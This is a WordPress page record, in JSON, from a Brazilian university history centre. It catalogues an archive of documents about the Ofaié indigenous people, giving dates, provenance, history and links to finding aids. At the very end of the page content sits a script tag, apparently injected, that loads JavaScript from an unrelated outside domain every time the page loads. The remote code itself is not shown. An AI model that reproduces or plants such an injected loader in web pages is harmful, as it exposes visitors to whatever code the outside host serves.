{"id":943,"date":"2017-08-24T06:23:48","date_gmt":"2017-08-24T06:23:48","guid":{"rendered":"http:\/\/www.ndh.ufms.br\/?page_id=943"},"modified":"2025-11-04T09:33:06","modified_gmt":"2025-11-04T13:33:06","slug":"o-acervo","status":"publish","type":"page","link":"https:\/\/ndh-cptl.ufms.br\/?page_id=943","title":{"rendered":"Ofai\u00e9 Acervo"},"content":{"rendered":"<p style=\"text-align: justify;\"><strong><a href=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/01\/OFAYE_final.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-688 size-full\" src=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/01\/OFAYE_final.jpg\" alt=\"OFAYE_final\" width=\"1280\" height=\"720\" srcset=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/01\/OFAYE_final.jpg 1280w, https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/01\/OFAYE_final-300x168.jpg 300w, https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/01\/OFAYE_final-1024x576.jpg 1024w\" sizes=\"auto, (max-width: 1280px) 100vw, 1280px\" \/><\/a><\/strong><\/p>\n<p style=\"text-align: justify;\"><strong>Identifica\u00e7\u00e3o:<\/strong>\u00a0 Ofai\u00e9 Ata\u00edde\u00a0Xehit\u00e2-ha<\/p>\n<p style=\"text-align: justify;\"><strong>C\u00f3digo:<\/strong>\u00a0OAXH<\/p>\n<p style=\"text-align: justify;\"><strong>Datas-limite:<\/strong>\u00a01911 \u2013 2014<\/p>\n<p style=\"text-align: justify;\"><strong>Dimens\u00e3o e suportes:<\/strong>\u00a08 caixas de arquivo. Impressos e manuscritos. M\u00eddias anexas ao Arquivo da Palavra.<\/p>\n<p style=\"text-align: justify;\"><strong>Produtores\/Colecionadores:<\/strong>\u00a0Carlos Alberto dos Santos Dutra e Ata\u00edde Xehit\u00e2-h\u00e1<\/p>\n<p style=\"text-align: justify;\"><strong>Hist\u00f3rico:<\/strong>\u00a0Desde ao menos o s\u00e9culo XIX h\u00e1 relatos da exist\u00eancia de ind\u00edgenas Ofai\u00e9 em uma grande por\u00e7\u00e3o de terras do centro-sul \u00e0 leste do sul de Mato Grosso (atual Mato Grosso do Sul), sempre habitando os cursos dos rios, at\u00e9 a margem direita do alto rio Paran\u00e1. Fontes oficiais e relatos de viajantes d\u00e3o conta de cerca de dois mil ind\u00edgenas desta etnia at\u00e9 o in\u00edcio do s\u00e9culo XX. As investidas dos sertanistas provindos do Tri\u00e2ngulo Mineiro e de S\u00e3o Paulo, na forma\u00e7\u00e3o de latif\u00fandios, levou ao constante deslocamento dos Ofai\u00e9 e a quase dizima\u00e7\u00e3o desse povo. Hoje s\u00e3o poucos que vivem em um pequeno aldeamento no munic\u00edpio de Brasil\u00e2ndia (leste do MS).<\/p>\n<p style=\"text-align: justify;\">Em novembro de 2016 o NDH\u00a0recebeu documenta\u00e7\u00e3o pertencente ao militante indigenista e pesquisador Carlos Alberto dos Santos Dutra, referente \u00e0 sua atua\u00e7\u00e3o junto aos Ofai\u00e9 em Brasil\u00e2ndia e Serra da Bodoquena (em Mato Grosso do Sul), entre os anos 1980 e a atualidade.<\/p>\n<p style=\"text-align: justify;\">O processo de organiza\u00e7\u00e3o e cataloga\u00e7\u00e3o do acervo contou com apoio do CNPq por meio de uma bolsa PIBIC que possibilitou o desenvolvimento do projeto \u201cResist\u00eancia Ind\u00edgena: fontes para a Hist\u00f3ria Ofai\u00e9\u201d, com olhar para o di\u00e1logo entre a Arquivologia, a Antropologia e a Hist\u00f3ria, tendo como resultado a Constru\u00e7\u00e3o de uma ferramenta\u00a0online. O conte\u00fado do acervo \u00e9 formado por relat\u00f3rios, transcri\u00e7\u00f5es, cartas, entrevistas, correspond\u00eancias, of\u00edcios, atas, gr\u00e1ficos, imagens, v\u00eddeos, bibliografias, material de imprensa e objetos da cultura material.<\/p>\n<p style=\"text-align: justify;\"><strong>Proced\u00eancia:<\/strong>\u00a0Acervo pessoal do pesquisador e indigenista Carlos Alberto Dutra, que h\u00e1 mais de 20 anos tem se dedicado a pesquisa etno-hist\u00f3rica desse grupo. Autor de livros como \u201cOfai\u00e9, o povo do mel\u201d 1991, \u201cOfai\u00e9, morte e vida de um povo\u201d 1996 e \u201cO territ\u00f3rio Ofai\u00e9 pelos caminhos da hist\u00f3ria\u201d 2011.<\/p>\n<p style=\"text-align: justify;\"><strong>Data de aquisi\u00e7\u00e3o:<\/strong>\u00a0novembro de 2016.<\/p>\n<p style=\"text-align: justify;\"><strong>Conte\u00fado:<\/strong>\u00a0Relat\u00f3rios, transcri\u00e7\u00f5es, cartas, entrevistas, correspond\u00eancias, of\u00edcios, processos, atas, gr\u00e1ficos, imagens, v\u00eddeos, bibliografias, material de imprensa e objetos da cultura material.<\/p>\n<p style=\"text-align: justify;\"><strong>Idiomas:<\/strong>\u00a0Portugu\u00eas-BRA<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2017\/09\/ACERVO_OFAIE_ATAIDE_XEHITA_HA1.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Instrumentos de pesquisa<\/strong>:<\/a>\u00a0Rela\u00e7\u00e3o do acervo com descri\u00e7\u00e3o de conte\u00fado, identificando subgrupos e s\u00e9ries.<\/p>\n<p><a href=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2024\/11\/DESCRICAO_FITAS_CASSETES_VHS_novembro_2024.pdf\" target=\"_blank\" rel=\"noopener\"><strong>Instrumento de pesquisa<\/strong><\/a>: Rela\u00e7\u00e3o de acervo audiovisual<\/p>\n<p style=\"text-align: justify;\"><a title=\"Acervo Ofai\u00e9 - Relat\u00f3rio PIBIC\" href=\"https:\/\/ndh-cptl.ufms.br\/wp-content\/uploads\/2020\/06\/RELATORIO_PIBIC_OFAIE.pdf\" target=\"_blank\" rel=\"noopener\">Relat\u00f3rio descritivo do acervo Ofai\u00e9<\/a>: Relat\u00f3rio PIBIC 2017.<\/p>\n<div class=\"t pg-1m0 pg-1x0 pg-1h3 pg-1y2 pg-1ff1 pg-1fs0 pg-1fc0 pg-1sc0 pg-1ls0 pg-1ws0\" style=\"text-align: left;\">\n<p style=\"text-align: justify;\"><strong>Grupos relacionados<\/strong><strong>:<\/strong> Instituto Administrativo Jesus Bom Pastor; Pastoral da Terra; Barrageiros.<\/p>\n<p style=\"text-align: justify;\"><strong>Acesso e Uso:<\/strong>\u00a0Aberto a consulta.<\/p>\n<p style=\"text-align: justify;\"><strong>Controle da descri\u00e7\u00e3o:<\/strong>\u00a0Lucas Cardoso Moreira e Vitor Wagner Neto de Oliveira<\/p>\n<p style=\"text-align: justify;\"><strong>Data da descri\u00e7\u00e3o:<\/strong>\u00a0agosto de 2017.<\/p>\n<\/div>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Identifica\u00e7\u00e3o:\u00a0 Ofai\u00e9 Ata\u00edde\u00a0Xehit\u00e2-ha C\u00f3digo:\u00a0OAXH Datas-limite:\u00a01911 \u2013 2014 Dimens\u00e3o e suportes:\u00a08 caixas de arquivo. Impressos e manuscritos. M\u00eddias anexas ao Arquivo da Palavra. Produtores\/Colecionadores:\u00a0Carlos Alberto dos Santos Dutra e Ata\u00edde Xehit\u00e2-h\u00e1 Hist\u00f3rico:\u00a0Desde ao menos o s\u00e9culo XIX h\u00e1 relatos da exist\u00eancia &hellip; <a href=\"https:\/\/ndh-cptl.ufms.br\/?page_id=943\">Continue lendo <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":746,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-943","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/943","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=943"}],"version-history":[{"count":26,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/943\/revisions"}],"predecessor-version":[{"id":1398,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/943\/revisions\/1398"}],"up":[{"embeddable":true,"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=\/wp\/v2\/pages\/746"}],"wp:attachment":[{"href":"https:\/\/ndh-cptl.ufms.br\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=943"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}